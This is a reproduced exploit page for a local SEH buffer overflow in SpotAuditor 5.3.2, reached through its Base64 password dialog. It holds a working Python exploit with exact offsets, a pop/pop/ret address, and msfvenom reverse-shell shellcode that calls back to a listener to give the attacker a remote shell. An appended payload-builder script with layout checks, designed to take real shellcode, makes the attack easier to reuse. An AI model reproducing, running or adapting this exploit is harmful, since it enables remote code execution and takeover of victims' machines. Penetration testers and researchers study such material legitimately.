SpotAuditor 5.3.2 – ‘Base64’ Local Buffer Overflow (SEH)

  • Author: Kirill Nikolaev
    Date: 2019-12-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47759/
  • # Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)
    # Exploit Author: Kirill Nikolaev
    # Date: 2019-12-06
    # Vulnerable Software: SpotAuditor
    # Vendor Homepage: http://www.nsauditor.com/
    # Version: 5.3.2
    # Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
    # Tested on: Windows 7 SP1 x86
    
    # PoC
    # 1. Download and install SpotAuditor
    # 2. Replace the shellcode in the python script with your own
    # 3. Generate the payload with the python script
    # 4. Run the software, open "Tools -> Base64 Encrypted Password" and paste the generated base64 string
    # 5. Catch the shell
    # Original DoS exploit: https://www.exploit-db.com/exploits/47719
    
    #!/usr/bin/env python
    # Runs under Python 2 and 3: every piece of the buffer is a bytes literal,
    # so the concatenation and base64.b64encode() work in both.
    
    import base64
    print("[+] Thank you for choosing our company")
    print("[+] Local Buffer Overflow (SEH) in SpotAuditor 5.3.2")
    print("[+] Created By Kirill Nikolaev")
    print("[+] Generate payload, check that you take your shellcode")
    print("")
    # 1024 bytes of filler: the next-SEH (nSEH) pointer is overwritten at offset 1024
    head = b'A' * 1024
    # nSEH: two harmless bytes (0x41 = inc ecx) followed by a short jump
    # (EB 0C = jmp $+0x0e) that hops over the SEH handler address into the
    # padding in front of the shellcode
    jmp_across = b'\x41\x41\xeb\x0c'
    # SEH handler address, little-endian:
    # 0x61e0b194 : pop ebx # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.15.2 (C:\Program Files\Nsasoft\SpotAuditor\sqlite3.dll)
    seh = b'\x94\xb1\xe0\x61'
    # 10 bytes of padding that the short jump lands in before execution reaches the shellcode
    header_for_shellcode = b'\x41' * 10
    # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.58.1 LPORT=4444 -f py EXITFUNC=thread -b '\x00'
    buf = b""
    buf += b"\xbd\x7a\xfe\x84\xdd\xdb\xc9\xd9\x74\x24\xf4\x58\x31"
    buf += b"\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\x12\xf0\x66"
    buf += b"\x28\x1e\xe4\xe5\xd3\xde\xf5\x89\x5a\x3b\xc4\x89\x39"
    buf += b"\x48\x77\x3a\x49\x1c\x74\xb1\x1f\xb4\x0f\xb7\xb7\xbb"
    buf += b"\xb8\x72\xee\xf2\x39\x2e\xd2\x95\xb9\x2d\x07\x75\x83"
    buf += b"\xfd\x5a\x74\xc4\xe0\x97\x24\x9d\x6f\x05\xd8\xaa\x3a"
    buf += b"\x96\x53\xe0\xab\x9e\x80\xb1\xca\x8f\x17\xc9\x94\x0f"
    buf += b"\x96\x1e\xad\x19\x80\x43\x88\xd0\x3b\xb7\x66\xe3\xed"
    buf += b"\x89\x87\x48\xd0\x25\x7a\x90\x15\x81\x65\xe7\x6f\xf1"
    buf += b"\x18\xf0\xb4\x8b\xc6\x75\x2e\x2b\x8c\x2e\x8a\xcd\x41"
    buf += b"\xa8\x59\xc1\x2e\xbe\x05\xc6\xb1\x13\x3e\xf2\x3a\x92"
    buf += b"\x90\x72\x78\xb1\x34\xde\xda\xd8\x6d\xba\x8d\xe5\x6d"
    buf += b"\x65\x71\x40\xe6\x88\x66\xf9\xa5\xc4\x4b\x30\x55\x15"
    buf += b"\xc4\x43\x26\x27\x4b\xf8\xa0\x0b\x04\x26\x37\x6b\x3f"
    buf += b"\x9e\xa7\x92\xc0\xdf\xee\x50\x94\x8f\x98\x71\x95\x5b"
    buf += b"\x58\x7d\x40\xcb\x08\xd1\x3b\xac\xf8\x91\xeb\x44\x12"
    buf += b"\x1e\xd3\x75\x1d\xf4\x7c\x1f\xe4\x9f\x42\x48\xdc\x5e"
    buf += b"\x2b\x8b\x20\x70\xf7\x02\xc6\x18\x17\x43\x51\xb5\x8e"
    buf += b"\xce\x29\x24\x4e\xc5\x54\x66\xc4\xea\xa9\x29\x2d\x86"
    buf += b"\xb9\xde\xdd\xdd\xe3\x49\xe1\xcb\x8b\x16\x70\x90\x4b"
    buf += b"\x50\x69\x0f\x1c\x35\x5f\x46\xc8\xab\xc6\xf0\xee\x31"
    buf += b"\x9e\x3b\xaa\xed\x63\xc5\x33\x63\xdf\xe1\x23\xbd\xe0"
    buf += b"\xad\x17\x11\xb7\x7b\xc1\xd7\x61\xca\xbb\x81\xde\x84"
    buf += b"\x2b\x57\x2d\x17\x2d\x58\x78\xe1\xd1\xe9\xd5\xb4\xee"
    buf += b"\xc6\xb1\x30\x97\x3a\x22\xbe\x42\xff\x42\x5d\x46\x0a"
    buf += b"\xeb\xf8\x03\xb7\x76\xfb\xfe\xf4\x8e\x78\x0a\x85\x74"
    buf += b"\x60\x7f\x80\x31\x26\x6c\xf8\x2a\xc3\x92\xaf\x4b\xc6"
    # Remaining space up to the 5000-byte length of the original DoS PoC;
    # computed but not appended to the payload, exactly as in the original
    tail = b'B' * (5000 - 1028 - 4 - 10 - len(buf))
    # Layout: [1024 x 'A'][nSEH: short jmp][SEH: pop/pop/ret][10 x pad][shellcode]
    shellcode = head + jmp_across + seh + header_for_shellcode + buf
    # The dialog expects base64 text, so the raw bytes are encoded before being pasted in
    print(base64.b64encode(shellcode).decode('ascii'))
    
    
    --
    Best regards,
    Kirill Nikolaev
    Penetration Tester
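Added example (not part of the original exploit and not code from SpotAuditor): the same SEH layout built generically and sanity-checked before it is base64-encoded. The nSEH offset (1024), the 10-byte pad and the sqlite3.dll pop/pop/ret address 0x61e0b194 are taken from the advisory above; the shellcode is a constructed placeholder (int3 followed by a jump to itself) standing in for the msfvenom output, and the function names (build_payload, jmp_landing, check_payload, encode_for_dialog) are this example's own. It packs the handler address with struct instead of hand-reversing the bytes, decodes the short jmp in the nSEH slot to confirm where execution lands (the advisory's EB 0C lands eight bytes into the pad; the example's displacement lands on the first shellcode byte, and either is accepted as long as the target is inside the pad or at the shellcode), and scans the whole buffer for the byte the msfvenom run excluded, which is the check worth repeating whenever the shellcode or offsets change.

```python
#!/usr/bin/env python3
"""Added example (not the original exploit): generic SEH payload builder
with layout checks.  Offsets and the P/P/R address come from the advisory;
the shellcode is a constructed placeholder."""
import base64
import struct

NSEH_OFFSET = 1024          # filler before the next-SEH pointer (advisory)
PPR_ADDR = 0x61e0b194       # pop ebx # pop ebp # ret in sqlite3.dll (advisory)
SLED_LEN = 10               # padding between handler slot and shellcode (advisory)
BAD_CHARS = b"\x00"         # byte the msfvenom run was told to avoid

# Constructed stand-in for the msfvenom shellcode: int3 ; jmp $ (stops in a debugger).
PLACEHOLDER_SHELLCODE = b"\xcc\xeb\xfe"


def short_jmp(distance):
    """Encode `jmp short rel8` skipping `distance` bytes after the 2-byte instruction."""
    if not -128 <= distance <= 127:
        raise ValueError("jmp short displacement out of range: %d" % distance)
    return b"\xeb" + struct.pack("<b", distance)


def build_payload(shellcode, sled_len=SLED_LEN):
    """Return (payload, layout): the raw overflow buffer and the offset of each region."""
    filler = b"A" * NSEH_OFFSET
    # nSEH: two harmless bytes (0x41 = inc ecx) + jmp over the 4-byte handler and the pad
    nseh = b"\x41\x41" + short_jmp(4 + sled_len)
    seh = struct.pack("<I", PPR_ADDR)     # little-endian handler address
    sled = b"\x41" * sled_len
    layout = {
        "nseh": NSEH_OFFSET,
        "seh": NSEH_OFFSET + 4,
        "sled": NSEH_OFFSET + 8,
        "shellcode": NSEH_OFFSET + 8 + sled_len,
    }
    return filler + nseh + seh + sled + shellcode, layout


def jmp_landing(payload, nseh_offset):
    """Decode the jmp short inside the nSEH slot and return the offset it lands on."""
    nseh = payload[nseh_offset:nseh_offset + 4]
    idx = nseh.find(b"\xeb")
    if idx < 0 or idx + 1 >= len(nseh):
        raise ValueError("no jmp short in nSEH slot")
    disp = struct.unpack("<b", nseh[idx + 1:idx + 2])[0]
    # target = end of the 2-byte jmp instruction + signed displacement
    return nseh_offset + idx + 2 + disp


def check_payload(payload, layout, shellcode):
    """Return a list of layout problems (empty when the buffer is consistent)."""
    problems = []
    seh_off = layout["seh"]
    if struct.unpack("<I", payload[seh_off:seh_off + 4])[0] != PPR_ADDR:
        problems.append("SEH handler slot does not hold the P/P/R address")
    landing = jmp_landing(payload, layout["nseh"])
    if not layout["sled"] <= landing <= layout["shellcode"]:
        problems.append("jmp short lands at %d, outside pad/shellcode" % landing)
    for bc in BAD_CHARS:
        if bytes([bc]) in payload:
            problems.append("bad char %#04x present in payload" % bc)
    if payload[layout["shellcode"]:] != shellcode:
        problems.append("shellcode is not at the expected offset")
    return problems


def encode_for_dialog(payload):
    """The dialog takes base64 text, so the raw bytes are pasted in encoded form."""
    return base64.b64encode(payload).decode("ascii")


if __name__ == "__main__":
    payload, layout = build_payload(PLACEHOLDER_SHELLCODE)
    print("layout:", layout)
    print("jmp short lands at offset", jmp_landing(payload, layout["nseh"]))
    print("problems:", check_payload(payload, layout, PLACEHOLDER_SHELLCODE) or "none")
    print(encode_for_dialog(payload))
```

Swap PLACEHOLDER_SHELLCODE for real msfvenom output and run the script; a non-empty problems list (for example a NUL byte that slipped past the encoder, or a displacement that overshoots the pad) is caught here rather than in the debugger.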